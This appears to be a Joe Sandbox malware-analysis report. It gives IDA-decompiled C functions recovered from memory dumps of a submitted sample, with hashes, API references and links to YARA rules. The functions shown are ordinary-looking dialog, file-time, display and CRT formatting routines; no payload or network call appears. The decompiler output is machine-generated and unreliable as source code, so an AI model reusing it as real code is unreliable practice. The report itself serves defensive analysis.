Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: afc54c7f5b556be7a93acd2ae3ca411c47300b0844f7f6c3cfa0cbea1b498169
Instruction ID: c7620a701f9b648b156b2fb5af3eafd05223eb909e3a902012e5a240f8c2e055
Opcode Fuzzy Hash: afc54c7f5b556be7a93acd2ae3ca411c47300b0844f7f6c3cfa0cbea1b498169
Instruction Fuzzy Hash: 7211E5339401157ADB229A649C49FFF3BEDEB09700F0080A0FA59B3180D7A499418B75

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7DCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t15;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xbbec88 = _a12;
				 *0xbbec8c = _a16;
				 *0xba8464 = _a20;
				if( *0xba8460 == 0) {
					if( *0xba8457 == 0) {
						_t19 = E00B7C220;
						_t15 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xba102c, _t15,  *0xba8458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xba1028, L"RENAMEDLG",  *0xba8450, E00B7D600, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x00b7dced
0x00b7dcf5
0x00b7dcfb
0x00b7dd00
0x00b7dd0d
0x00b7dd17
0x00b7dd1c
0x00b7dd46
0x00b7dd5d
0x00b7dd62
0x00000000
0x00000000
0x00b7dd44
0x00000000
0x00000000
0x00b7dd44
0x00000000
0x00b7dd68
0x00000000
0x00b7dd11
0x00000000

Strings

RENAMEDLG, xrefs: 00B7DD31
REPLACEFILEDLG, xrefs: 00B7DD1C, 00B7DD50

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 4a66851a03423a7ddae2f490851867ed9bfabbe9e3f790eb50e992f05b060dbf
Instruction ID: dc85007ef0d0075aa750853fd05200590d84fbdf3383179248508ce2201b1193
Opcode Fuzzy Hash: 4a66851a03423a7ddae2f490851867ed9bfabbe9e3f790eb50e992f05b060dbf
Instruction Fuzzy Hash: E0019276604245AFCB215F54EC45A563FF5FB097C4B0084B5F91983230CE319C50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A699 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7A699() {
				int _t4;
				struct HDC__* _t7;

				_t7 = GetDC(0);
				_t4 = GetDeviceCaps(_t7, 0xc);
				return ReleaseDC(0, _t7) & 0xffffff00 | _t4 - 0x00000020 >= 0x00000000;
			}

0x00b7a6a3
0x00b7a6a8
0x00b7a6c1

APIs

GetDC.USER32(00000000), ref: 00B7A69D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7A6A8
ReleaseDC.USER32(00000000,00000000), ref: 00B7A6B3

Strings

v, xrefs: 00B7A6B3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CapsDeviceRelease
String ID: v
API String ID: 127614599-1801730948
Opcode ID: 57579304a30cd470ae3c41287ba982461bf0ef808f1478542cbc95db6cdd85ad
Instruction ID: 0a2932f93c32f0ee49d69b399aa7a1b2b0ad81a1630cfa96b9a24079851f6ed0
Opcode Fuzzy Hash: 57579304a30cd470ae3c41287ba982461bf0ef808f1478542cbc95db6cdd85ad
Instruction Fuzzy Hash: E0D0C933580221B7E26027A97C4FF9B2EA5DBCDF61F468114FA059B1D4DE654D8286A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B89A1E Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00B89A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00B84636(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00B7EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00B7EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xb852a1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00B7FFF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00B7EE10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00B92260();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00B92260();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00B92260();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00B89D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00B92430(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00B891A8();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00B89087();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00b89a1e
0x00b89a29
0x00b89a30
0x00b89a32
0x00b89a32
0x00b89a34
0x00b89a3d
0x00b89a3f
0x00b89a44
0x00b89a4a
0x00b89a60
0x00b89a65
0x00b89a68
0x00b89a75
0x00b89a7a
0x00b89ace
0x00b89ad6
0x00b89ad8
0x00b89ada
0x00b89add
0x00b89add
0x00b89add
0x00b89ae3
0x00b89aeb
0x00b89afe
0x00b89b01
0x00b89b03
0x00b89b06
0x00b89b07
0x00b89b28
0x00b89b2b
0x00b89b2b
0x00b89b09
0x00b89b09
0x00b89b0b
0x00b89b16
0x00b89b16
0x00b89b18
0x00b89b1f
0x00b89b1a
0x00b89b1a
0x00b89b1a
0x00b89b18
0x00b89b2c
0x00b89b2e
0x00b89b2f
0x00b89b32
0x00b89b34
0x00b89b48
0x00b89b36
0x00b89b36
0x00b89b36
0x00b89b4d
0x00b89b4d
0x00b89b52
0x00b89b55
0x00b89b60
0x00b89b60
0x00b89b60
0x00b89b60
0x00b89b64
0x00b89b6b
0x00b89b6c
0x00b89b6f
0x00b89b72
0x00b89b72
0x00b89b74
0x00000000
0x00000000
0x00b89b8c
0x00b89b93
0x00b89b97
0x00b89b9a
0x00b89b9d
0x00b89b9f
0x00b89b9f
0x00b89b9f
0x00b89ba1
0x00b89ba4
0x00b89ba7
0x00b89ba9
0x00b89bb1
0x00b89bb7
0x00b89bba
0x00b89bbd
0x00b89bbe
0x00b89bc1
0x00b89bc4
0x00b89bc4
0x00b89bc9
0x00b89bcc
0x00000000
0x00000000
0x00b89be4
0x00b89be9
0x00b89bed
0x00000000
0x00000000
0x00b89bf1
0x00b89bf1
0x00b89bf4
0x00b89bf5
0x00b89bf5
0x00b89bf7
0x00b89bfa
0x00000000
0x00000000
0x00b89bfc
0x00b89bff
0x00b89c06
0x00b89c09
0x00b89c0c
0x00b89c22
0x00b89c22
0x00b89c22
0x00b89c0e
0x00b89c0e
0x00b89c10
0x00b89c13
0x00b89c1e
0x00b89c15
0x00b89c18
0x00b89c18
0x00b89c13
0x00000000
0x00b89c0c
0x00b89c01
0x00b89c01
0x00b89c03
0x00b89c03
0x00b89b57
0x00b89b57
0x00b89b5a
0x00b89c25
0x00b89c25
0x00b89c27
0x00b89c29
0x00b89c2c
0x00b89c2d
0x00b89c2e
0x00b89c2f
0x00b89c37
0x00b89c37
0x00b89c37
0x00b89c39
0x00b89c3c
0x00b89c3f
0x00b89c41
0x00b89c41
0x00b89c43
0x00b89c55
0x00b89c59
0x00b89c5c
0x00b89c63
0x00b89c6b
0x00b89c6b
0x00b89c6e
0x00b89c70
0x00b89c81
0x00b89c81
0x00b89c85
0x00b89c85
0x00b89c88
0x00b89c8a
0x00b89c8d
0x00000000
0x00b89c72
0x00b89c72
0x00b89c78
0x00b89c78
0x00b89c7c
0x00b89c8f
0x00b89c8f
0x00b89c93
0x00b89c94
0x00b89c96
0x00b89c98
0x00b89cd9
0x00b89cd9
0x00b89cdb
0x00b89ce8
0x00b89ce8
0x00b89cea
0x00b89cec
0x00b89ced
0x00b89cee
0x00b89cf5
0x00b89cf8
0x00b89cfa
0x00b89cfa
0x00b89cfb
0x00b89cfd
0x00b89d00
0x00b89d00
0x00b89d02
0x00b89d04
0x00000000
0x00b89d04
0x00b89cdd
0x00b89cdf
0x00000000
0x00000000
0x00b89ce1
0x00000000
0x00000000
0x00b89ce3
0x00b89ce6
0x00000000
0x00000000
0x00000000
0x00b89ce6
0x00b89c9f
0x00b89ca5
0x00b89ca5
0x00b89ca7
0x00b89ca8
0x00b89ca9
0x00b89caa
0x00b89cb1
0x00b89cb4
0x00b89cb6
0x00b89cb7
0x00b89cb9
0x00b89cc6
0x00b89cc6
0x00b89cc8
0x00b89cca
0x00b89ccb
0x00b89ccc
0x00b89cd3
0x00b89cd6
0x00b89cd8
0x00b89cd8
0x00000000
0x00b89cd8
0x00b89cbb
0x00b89cbb
0x00b89cbd
0x00000000
0x00000000
0x00b89cbf
0x00000000
0x00000000
0x00b89cc1
0x00b89cc4
0x00000000
0x00000000
0x00000000
0x00b89cc4
0x00b89ca1
0x00b89ca3
0x00000000
0x00000000
0x00000000
0x00b89ca3
0x00b89c74
0x00b89c76
0x00000000
0x00000000
0x00000000
0x00b89c76
0x00b89c70
0x00000000
0x00b89b5a
0x00b89b55
0x00b89a7c
0x00b89a7e
0x00000000
0x00b89a80
0x00b89a96
0x00b89a9b
0x00b89a9d
0x00b89aa9
0x00b89aaf
0x00b89ab0
0x00b89ab2
0x00b89ab4
0x00b89abf
0x00b89abf
0x00b89ac2
0x00b89ac4
0x00b89ac4
0x00b89ac7
0x00b89a9f
0x00b89a9f
0x00b89a9f
0x00000000
0x00b89a9d
0x00b89a4c
0x00b89a4c
0x00b89a53
0x00b89a54
0x00b89a56
0x00b89d08
0x00b89d0c
0x00b89d11
0x00b89d11
0x00b89d20
0x00b89d20

APIs

_strrchr.LIBCMT ref: 00B89AA9
__alldvrm.LIBCMT ref: 00B89CAA
__alldvrm.LIBCMT ref: 00B89CCC

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 539603834d74e7dd6a3b7d224da3376bd1dd71ec19a6129884d4d0672baf1d70
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: AEA14572A043869FEF25EF68C8817BEBBE5EF55310F2C41EDE4959B2A1C2358941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A354 Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B6A354(void* __edx) {
				signed char _t41;
				void* _t42;
				void* _t53;
				signed char _t70;
				void* _t78;
				signed int* _t79;
				signed int* _t80;
				void* _t81;
				signed int* _t82;
				void* _t83;

				_t78 = __edx;
				E00B7EC50(0x1024);
				_t80 =  *(_t83 + 0x1038);
				_t70 = 1;
				if(_t80 == 0) {
					L2:
					 *(_t83 + 0x11) = 0;
					L3:
					_t79 =  *(_t83 + 0x1040);
					if(_t79 == 0) {
						L5:
						 *(_t83 + 0x13) = 0;
						L6:
						_t82 =  *(_t83 + 0x1044);
						if(_t82 == 0) {
							L8:
							 *(_t83 + 0x12) = 0;
							L9:
							_t41 = E00B6A243( *(_t83 + 0x1038));
							 *(_t83 + 0x18) = _t41;
							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
								_t70 = 0;
							} else {
								E00B6A4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
							}
							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t83 + 0x14) = _t42;
							if(_t42 != 0xffffffff) {
								L16:
								if( *(_t83 + 0x11) != 0) {
									E00B7138A(_t80, _t78, _t83 + 0x1c);
								}
								if( *(_t83 + 0x13) != 0) {
									E00B7138A(_t79, _t78, _t83 + 0x2c);
								}
								if( *(_t83 + 0x12) != 0) {
									E00B7138A(_t82, _t78, _t83 + 0x24);
								}
								_t81 =  *(_t83 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
								_t53 = CloseHandle(_t81);
								if(_t70 != 0) {
									_t53 = E00B6A4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
								}
								goto L24;
							} else {
								_t53 = E00B6BB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
								if(_t53 == 0) {
									L24:
									return _t53;
								}
								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t83 + 0x14) = _t53;
								if(_t53 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t83 + 0x12) = _t70;
						if(( *_t82 | _t82[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t83 + 0x13) = _t70;
					if(( *_t79 | _t79[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t83 + 0x11) = 1;
				if(( *_t80 | _t80[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00b6a354
0x00b6a359
0x00b6a365
0x00b6a36c
0x00b6a370
0x00b6a37d
0x00b6a37d
0x00b6a381
0x00b6a381
0x00b6a38a
0x00b6a397
0x00b6a397
0x00b6a39b
0x00b6a39b
0x00b6a3a4
0x00b6a3b2
0x00b6a3b2
0x00b6a3b6
0x00b6a3bd
0x00b6a3c2
0x00b6a3c9
0x00b6a3df
0x00b6a3cf
0x00b6a3d8
0x00b6a3d8
0x00b6a3fa
0x00b6a400
0x00b6a407
0x00b6a451
0x00b6a456
0x00b6a45f
0x00b6a45f
0x00b6a469
0x00b6a472
0x00b6a472
0x00b6a47c
0x00b6a485
0x00b6a485
0x00b6a495
0x00b6a499
0x00b6a4a9
0x00b6a4b9
0x00b6a4bf
0x00b6a4c6
0x00b6a4ce
0x00b6a4db
0x00b6a4db
0x00000000
0x00b6a409
0x00b6a41a
0x00b6a421
0x00b6a4e4
0x00b6a4ea
0x00b6a4ea
0x00b6a43e
0x00b6a444
0x00b6a44b
0x00000000
0x00000000
0x00000000
0x00b6a44b
0x00b6a407
0x00b6a3ac
0x00b6a3b0
0x00000000
0x00000000
0x00000000
0x00b6a3b0
0x00b6a391
0x00b6a395
0x00000000
0x00000000
0x00000000
0x00b6a395
0x00b6a377
0x00b6a37b
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B67F69,?,?,?), ref: 00B6A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B67F69,?), ref: 00B6A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B67F69,?,?,?,?,?,?,?), ref: 00B6A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00B67F69,?,?,?,?,?,?,?,?,?,?), ref: 00B6A4C6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: f088af05e2ba8fb953c1baecb1c16233c77290be984f5930160f726879b8c0a3
Instruction ID: 59b67a0db78ce94c1a093555acf4c9958b14e4268a715fbc5fe247edb1a1b406
Opcode Fuzzy Hash: f088af05e2ba8fb953c1baecb1c16233c77290be984f5930160f726879b8c0a3
Instruction Fuzzy Hash: 6741B131148381AADB21DF24DC45F9EBBE4EF85700F044999B5E5A3280DAA8DA489F63

Uniqueness

Uniqueness Score: -1.00%

Function 00B61100 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00B61100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1114;
				char _v1116;
				void* __edi;
				signed int _t44;
				signed int _t52;
				intOrPtr _t67;
				short* _t80;
				void* _t83;
				char _t84;
				signed int _t85;
				void* _t87;
				signed int _t97;

				_t79 = _a16;
				_t81 =  &_v1116;
				if(_a16 != 0) {
					E00B70602( &_v1116, _t79, 0x200);
					_t87 =  &_v1114 + E00B83E13( &_v1116) * 2;
					E00B70602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
					_t81 = _t87 + E00B83E13(_t87) * 2 + 2;
				}
				E00B70602(_t81, E00B6E617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
				_t83 = _t81 + E00B83E13(_t81) * 2 + 2;
				E00B70602(_t83, 0xb935f0, 0x200 - (_t83 -  &_v1116 >> 1));
				_t44 = E00B83E13(_t83);
				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
				_t84 = 0x58;
				E00B7FFF0(_t79,  &_v92, 0, _t84);
				_t67 = _a20;
				_t80 = _a12;
				_v88 = _a4;
				_v84 =  *0xba1028;
				_v80 =  &_v1116;
				_v44 = _a8;
				_v92 = _t84;
				_v64 = _t80;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_t67 == 0) {
					_t52 =  *0xbc3044();
				} else {
					_t52 =  *0xbc303c();
				}
				_t85 = _t52;
				if(_t85 == 0) {
					_t52 =  *0xbc3040();
					if(_t52 == 0x3002) {
						 *_t80 = 0;
						_push( &_v92);
						if(_t67 == 0) {
							_t52 =  *0xbc3044();
						} else {
							_t52 =  *0xbc303c();
						}
						_t85 = _t52;
					}
					_t97 = _t85;
				}
				return _t52 & 0xffffff00 | _t97 != 0x00000000;
			}

0x00b6110c
0x00b6110f
0x00b6111c
0x00b61123
0x00b61137
0x00b6114d
0x00b6115c
0x00b6115c
0x00b6117c
0x00b61191
0x00b611a3
0x00b611a9
0x00b611b2
0x00b611ba
0x00b611be
